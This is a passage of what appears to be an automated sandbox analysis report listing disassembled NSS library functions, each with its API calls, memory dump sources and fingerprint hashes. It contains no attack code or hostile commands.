                                                                                                                                                                                                                                                            • __WSAFDIsSet.WSOCK32(?,?,?,?), ref: 6BE41EDB
                                                                                                                                                                                                                                                            • __WSAFDIsSet.WSOCK32(?,?,?,?,?,?), ref: 6BE41EEC
                                                                                                                                                                                                                                                            • PR_IntervalToMicroseconds.NSS3(?), ref: 6BE41F83
                                                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE897,00000000), ref: 6BE4209B
                                                                                                                                                                                                                                                            • PR_Sleep.NSS3(?), ref: 6BE420BD
                                                                                                                                                                                                                                                            • WSAGetLastError.WSOCK32(00000000,?,?,?,00000000), ref: 6BE420E5
                                                                                                                                                                                                                                                            • PR_GetIdentitiesLayer.NSS3(?,00000000,00000000,?,?,?,00000000), ref: 6BE42139
                                                                                                                                                                                                                                                            • #7.WSOCK32(0000FFFF,0000FFFF,00001008,?,00000004), ref: 6BE42153
                                                                                                                                                                                                                                                            • WSAGetLastError.WSOCK32(0000FFFF,0000FFFF,00001008,?,00000004), ref: 6BE42176
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ErrorIdentitiesLayer$Last$IntervalMicrosecondsSleepValueselect
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 975171332-0
                                                                                                                                                                                                                                                            • Opcode ID: 0216f832aaebaacc2fbb2f94d07a32b558f2192e64cb45be7de953974b16ea20
                                                                                                                                                                                                                                                            • Instruction ID: fbd30633d4379db28d2f36861055b1b64bd11df2b4093a51372e59c6b4d9ab1e
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0216f832aaebaacc2fbb2f94d07a32b558f2192e64cb45be7de953974b16ea20
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 39F10371E112248BDB25CF64DC907A9B7F9EF80748F2080E9DA0A9B290D37C9F95CB51
                                                                                                                                                                                                                                                            Function 6BF0A9A0 Relevance: 21.2, APIs: 14, Instructions: 214COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • PORT_NewArena_Util.NSS3(00000800), ref: 6BF0A9CA
                                                                                                                                                                                                                                                              • Part of subcall function 6BF20FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6BEC87ED,00000800,6BEBEF74,00000000), ref: 6BF21000
                                                                                                                                                                                                                                                              • Part of subcall function 6BF20FF0: PR_NewLock.NSS3(?,00000800,6BEBEF74,00000000), ref: 6BF21016
                                                                                                                                                                                                                                                              • Part of subcall function 6BF20FF0: PL_InitArenaPool.NSS3(00000000,security,6BEC87ED,00000008,?,00000800,6BEBEF74,00000000), ref: 6BF2102B
                                                                                                                                                                                                                                                            • SEC_QuickDERDecodeItem_Util.NSS3(00000000,?,6C020B04,?), ref: 6BF0A9F7
                                                                                                                                                                                                                                                              • Part of subcall function 6BF1B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6BFF18D0,?), ref: 6BF1B095
                                                                                                                                                                                                                                                            • PORT_FreeArena_Util.NSS3(00000000,00000001), ref: 6BF0AA0B
                                                                                                                                                                                                                                                            • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6BF0AA33
                                                                                                                                                                                                                                                            • PK11_GetInternalKeySlot.NSS3 ref: 6BF0AA55
                                                                                                                                                                                                                                                            • PK11_Authenticate.NSS3(00000000,00000001,?), ref: 6BF0AA69
                                                                                                                                                                                                                                                            • PORT_FreeArena_Util.NSS3(00000001,00000001), ref: 6BF0AAD4
                                                                                                                                                                                                                                                            • PK11_ListFixedKeysInSlot.NSS3(?,00000000,?), ref: 6BF0AB18
                                                                                                                                                                                                                                                            • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6BF0AB5A
                                                                                                                                                                                                                                                            • PK11_FreeSymKey.NSS3(00000000), ref: 6BF0AB85
                                                                                                                                                                                                                                                            • PK11_FreeSymKey.NSS3(00000000), ref: 6BF0AB99
                                                                                                                                                                                                                                                            • PORT_FreeArena_Util.NSS3(?,00000001), ref: 6BF0ABDC
                                                                                                                                                                                                                                                            • PK11_FreeSymKey.NSS3(?), ref: 6BF0ABE9
                                                                                                                                                                                                                                                            • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6BF0ABF7
                                                                                                                                                                                                                                                              • Part of subcall function 6BF0AC10: PK11_CreateContextBySymKey.NSS3(00000133,00000105,00000000,?,?,6BF0AB3E,?,?,?), ref: 6BF0AC35
                                                                                                                                                                                                                                                              • Part of subcall function 6BF0AC10: PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?,?,6BF0AB3E,?,?,?), ref: 6BF0AC55
                                                                                                                                                                                                                                                              • Part of subcall function 6BF0AC10: PK11_CipherOp.NSS3(?,00000000,?,?,?,?,?,?,?,?,?,?,?,6BF0AB3E,?,?), ref: 6BF0AC70
                                                                                                                                                                                                                                                              • Part of subcall function 6BF0AC10: PK11_GetBlockSize.NSS3(00000133,00000000), ref: 6BF0AC92
                                                                                                                                                                                                                                                              • Part of subcall function 6BF0AC10: PK11_DestroyContext.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,6BF0AB3E), ref: 6BF0ACD7
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: K11_$Util$Free$Arena_Item_$Zfree$ArenaContextSlot$Alloc_AuthenticateBlockCipherCreateDecodeDestroyErrorFixedInitInternalKeysListLockPoolQuickSizecalloc
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2602994911-0
                                                                                                                                                                                                                                                            • Opcode ID: bf2bf0ca6b472acd36eed4bca11655ca4c043e119797bd85651f77e9e0f2e03f
                                                                                                                                                                                                                                                            • Instruction ID: e8376ddc9b108aba4d7255d039e1728560dc204da663f47b9ca540bf702eca3e
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bf2bf0ca6b472acd36eed4bca11655ca4c043e119797bd85651f77e9e0f2e03f
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3971F2B39083029BD701CE78DC51B1BB3E6AF84754F004A29F968972B1FF79D944A792
                                                                                                                                                                                                                                                            Function 6BF568E0 Relevance: 12.2, APIs: 8, Instructions: 241COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • PR_GetIdentitiesLayer.NSS3 ref: 6BF568FC
                                                                                                                                                                                                                                                            • PR_EnterMonitor.NSS3 ref: 6BF56924
                                                                                                                                                                                                                                                              • Part of subcall function 6BF89090: TlsGetValue.KERNEL32 ref: 6BF890AB
                                                                                                                                                                                                                                                              • Part of subcall function 6BF89090: TlsGetValue.KERNEL32 ref: 6BF890C9
                                                                                                                                                                                                                                                              • Part of subcall function 6BF89090: EnterCriticalSection.KERNEL32 ref: 6BF890E5
                                                                                                                                                                                                                                                              • Part of subcall function 6BF89090: TlsGetValue.KERNEL32 ref: 6BF89116
                                                                                                                                                                                                                                                              • Part of subcall function 6BF89090: LeaveCriticalSection.KERNEL32 ref: 6BF8913F
                                                                                                                                                                                                                                                              • Part of subcall function 6BEB07A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6BE4204A), ref: 6BEB07AD
                                                                                                                                                                                                                                                              • Part of subcall function 6BEB07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6BE4204A), ref: 6BEB07CD
                                                                                                                                                                                                                                                              • Part of subcall function 6BEB07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6BE4204A), ref: 6BEB07D6
                                                                                                                                                                                                                                                              • Part of subcall function 6BEB07A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6BE4204A), ref: 6BEB07E4
                                                                                                                                                                                                                                                              • Part of subcall function 6BEB07A0: TlsSetValue.KERNEL32(00000000,?,6BE4204A), ref: 6BEB0864
                                                                                                                                                                                                                                                              • Part of subcall function 6BEB07A0: calloc.MOZGLUE(00000001,0000002C), ref: 6BEB0880
                                                                                                                                                                                                                                                              • Part of subcall function 6BEB07A0: TlsSetValue.KERNEL32(00000000,?,?,6BE4204A), ref: 6BEB08CB
                                                                                                                                                                                                                                                              • Part of subcall function 6BEB07A0: TlsGetValue.KERNEL32(?,?,6BE4204A), ref: 6BEB08D7
                                                                                                                                                                                                                                                              • Part of subcall function 6BEB07A0: TlsGetValue.KERNEL32(?,?,6BE4204A), ref: 6BEB08FB
                                                                                                                                                                                                                                                            • PR_EnterMonitor.NSS3 ref: 6BF5693E
                                                                                                                                                                                                                                                            • TlsGetValue.KERNEL32 ref: 6BF56977
                                                                                                                                                                                                                                                            • TlsGetValue.KERNEL32 ref: 6BF569B8
                                                                                                                                                                                                                                                            • PR_ExitMonitor.NSS3 ref: 6BF56B1E
                                                                                                                                                                                                                                                            • PR_ExitMonitor.NSS3 ref: 6BF56B39
                                                                                                                                                                                                                                                            • TlsGetValue.KERNEL32 ref: 6BF56B62
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Value$Monitor$Enter$CriticalExitSectioncalloc$IdentitiesLayerLeave
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 4003455268-0
                                                                                                                                                                                                                                                            • Opcode ID: 6330898693c951006dba2f01e6ad223249b2f17eabb566fa883268a37470a18a
                                                                                                                                                                                                                                                            • Instruction ID: 31b050619bef13ab484eb255297be4e0a16f6d9fb6b0eabe6b3599cea8a9ad38
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6330898693c951006dba2f01e6ad223249b2f17eabb566fa883268a37470a18a
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 43917E77A58100EBDB80DF6DC4805197FB2FB97714B618299E8A44F239C739E9A1CB81
                                                                                                                                                                                                                                                            Function 6BEE09A0 Relevance: 11.0, APIs: 7, Instructions: 489memoryCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                              • Part of subcall function 6BEE06A0: TlsGetValue.KERNEL32 ref: 6BEE06C2
                                                                                                                                                                                                                                                              • Part of subcall function 6BEE06A0: EnterCriticalSection.KERNEL32(?), ref: 6BEE06D6
                                                                                                                                                                                                                                                              • Part of subcall function 6BEE06A0: PR_Unlock.NSS3 ref: 6BEE06EB
                                                                                                                                                                                                                                                            • memcmp.VCRUNTIME140(00000000,6BEC9B8A,0000000C,?,?,?,?,?,?,00000000,00000000,?,?,6BEC9B8A,00000000,k-k), ref: 6BEE09D9
                                                                                                                                                                                                                                                            • PORT_ArenaAlloc_Util.NSS3(00000000,0000000C,?,?,?,?,?,?,00000000,00000000,?,?,6BEC9B8A,00000000,k-k), ref: 6BEE09F2
                                                                                                                                                                                                                                                            • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,00000000,00000000,?,?,6BEC9B8A,00000000,k-k), ref: 6BEE0A1C
                                                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000,00000000,?,?,6BEC9B8A,00000000,k-k), ref: 6BEE0A30
                                                                                                                                                                                                                                                            • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,00000000,00000000,?,?,6BEC9B8A,00000000,k-k), ref: 6BEE0A48
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CriticalEnterSectionUnlockValue$Alloc_ArenaUtilmemcmp
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 115324291-0
                                                                                                                                                                                                                                                            • Opcode ID: 30d7fc6418106725e42a477868c7aadd74bad6ca32ebf33ee6b0acf86f66bb1f
                                                                                                                                                                                                                                                            • Instruction ID: 05c76a9263e9ae99c8c340e1f5d4e48405e824af25878bd418bbf2e1c54ac250
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 30d7fc6418106725e42a477868c7aadd74bad6ca32ebf33ee6b0acf86f66bb1f
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5102D4B1E006059FEB008F74DC42BAB77B5FF48358F240568D915A7362EB39E952CBA1
                                                                                                                                                                                                                                                            Function 6BF56BE0 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 196COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • TlsGetValue.KERNEL32 ref: 6BF56C2C
                                                                                                                                                                                                                                                              • Part of subcall function 6BF56E90: PR_GetEnvSecure.NSS3(SSLKEYLOGFILE,?,6BF56BF7), ref: 6BF56EB6
                                                                                                                                                                                                                                                              • Part of subcall function 6BF56E90: fopen.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,6BFFFC0A,6BF56BF7), ref: 6BF56ECD
                                                                                                                                                                                                                                                              • Part of subcall function 6BF56E90: ftell.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6BF56EE0
                                                                                                                                                                                                                                                              • Part of subcall function 6BF56E90: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(# SSL/TLS secrets log file, generated by NSS,0000002D,00000001), ref: 6BF56EFC
                                                                                                                                                                                                                                                              • Part of subcall function 6BF56E90: PR_NewLock.NSS3 ref: 6BF56F04
                                                                                                                                                                                                                                                              • Part of subcall function 6BF56E90: fclose.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6BF56F18
                                                                                                                                                                                                                                                              • Part of subcall function 6BF56E90: PR_GetEnvSecure.NSS3(SSLFORCELOCKS,6BF56BF7), ref: 6BF56F30
                                                                                                                                                                                                                                                              • Part of subcall function 6BF56E90: PR_GetEnvSecure.NSS3(NSS_SSL_ENABLE_RENEGOTIATION,?,6BF56BF7), ref: 6BF56F54
                                                                                                                                                                                                                                                            • TlsGetValue.KERNEL32 ref: 6BF56D93
                                                                                                                                                                                                                                                            • PR_GetEnvSecure.NSS3(NSS_SSL_REQUIRE_SAFE_NEGOTIATION,?,?,6BF56BF7), ref: 6BF56FE0
                                                                                                                                                                                                                                                            • PR_GetEnvSecure.NSS3(NSS_SSL_CBC_RANDOM_IV,?,?,?,6BF56BF7), ref: 6BF56FFD
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            • NSS_SSL_REQUIRE_SAFE_NEGOTIATION, xrefs: 6BF56FDB
                                                                                                                                                                                                                                                            • NSS_SSL_CBC_RANDOM_IV, xrefs: 6BF56FF8
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Secure$Value$Lockfclosefopenftellfwrite
                                                                                                                                                                                                                                                            • String ID: NSS_SSL_CBC_RANDOM_IV$NSS_SSL_REQUIRE_SAFE_NEGOTIATION
                                                                                                                                                                                                                                                            • API String ID: 3032383292-3007362596
                                                                                                                                                                                                                                                            • Opcode ID: aee9863e14bed2b522052fbbdb4a270eaea5de8868c6327b7960696afaffdfd9
                                                                                                                                                                                                                                                            • Instruction ID: c3b014ce599769cdf65301b5cf069b42790673de51a85d643e708420f0055837
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: aee9863e14bed2b522052fbbdb4a270eaea5de8868c6327b7960696afaffdfd9
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AA712DB374E644DFDF288B2CC5B152437F1A767708B500219ED634A6A2DE3CB4A2C75A
                                                                                                                                                                                                                                                            Function 6BF6C9E0 Relevance: 7.7, APIs: 5, Instructions: 187timeCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • PR_NormalizeTime.NSS3(00000000,?), ref: 6BF6CEA5
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: NormalizeTime
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1467309002-0
                                                                                                                                                                                                                                                            • Opcode ID: 7ea2ceed78ab6553725bead6f4f0a5499e7fec1224e682430f1d68590ccd362d
                                                                                                                                                                                                                                                            • Instruction ID: 0e51e39ba77267284d10a38a2814275aa1ab39d2d81a06ef7e3c9dbadcbd5f86
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7ea2ceed78ab6553725bead6f4f0a5499e7fec1224e682430f1d68590ccd362d
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1D717172A047418FC704CF38C48461ABBF1FF89754F258A6EE8A9872A1E734D955CB91
                                                                                                                                                                                                                                                            Function 6BF35B90 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 366COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • memset.VCRUNTIME140(?,00000000,?), ref: 6BF35D55
                                                                                                                                                                                                                                                            • memcpy.VCRUNTIME140(?,?,?), ref: 6BF35D8B
                                                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFD027,00000000), ref: 6BF35F5C
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Errormemcpymemset
                                                                                                                                                                                                                                                            • String ID: UUUU
                                                                                                                                                                                                                                                            • API String ID: 2691834222-1798160573
                                                                                                                                                                                                                                                            • Opcode ID: be8745ff4245ae8e6d01c2c0d79feeed02e79ca1bae97b75bdae4f60a305da09
                                                                                                                                                                                                                                                            • Instruction ID: 79ce164b3610655a9039c2677834300b82be0bcc17afb43715e906c37707fd33
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: be8745ff4245ae8e6d01c2c0d79feeed02e79ca1bae97b75bdae4f60a305da09
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DED1E472A046218FDB14CF38C8847AB7BF1BF84319F148569E959DB2A1E739E941CBD0
                                                                                                                                                                                                                                                            Function 6BF90B40 Relevance: 4.6, APIs: 3, Instructions: 92COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • sqlite3_bind_int64.NSS3(?,?,?,?), ref: 6BF90B7C
                                                                                                                                                                                                                                                            • sqlite3_bind_double.NSS3 ref: 6BF90BF1
                                                                                                                                                                                                                                                            • sqlite3_bind_zeroblob.NSS3(?,?,00000000), ref: 6BF90C27
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: sqlite3_bind_doublesqlite3_bind_int64sqlite3_bind_zeroblob
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 4141409403-0
                                                                                                                                                                                                                                                            • Opcode ID: 11baa2d82d9da5647b6e0c01529eb1d661f0de318a1285e7597495bd746038b1
                                                                                                                                                                                                                                                            • Instruction ID: f0a74790cf20ea05ace92a8465be147c6a3e6a7f01037878aa8869b952526439
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 11baa2d82d9da5647b6e0c01529eb1d661f0de318a1285e7597495bd746038b1
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8A212933948510DFE7017F38AC11D2AB7BAEF86728F158195E9544B2A1DB78980187D1
                                                                                                                                                                                                                                                            Function 6BF25890 Relevance: 84.3, APIs: 36, Strings: 12, Instructions: 340stringmemoryCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?), ref: 6BF258A9
                                                                                                                                                                                                                                                            • PORT_ZAlloc_Util.NSS3(00000001,?,?), ref: 6BF258BC
                                                                                                                                                                                                                                                            • memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?), ref: 6BF258CA
                                                                                                                                                                                                                                                            • strcat.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?), ref: 6BF258DE
                                                                                                                                                                                                                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?), ref: 6BF258E7
                                                                                                                                                                                                                                                            • free.MOZGLUE(?,?,?,?,?,?,?,?,?,?), ref: 6BF258F8
                                                                                                                                                                                                                                                            • PORT_ZAlloc_Util.NSS3(0000002D,?,?,?,?,?,?), ref: 6BF2591B
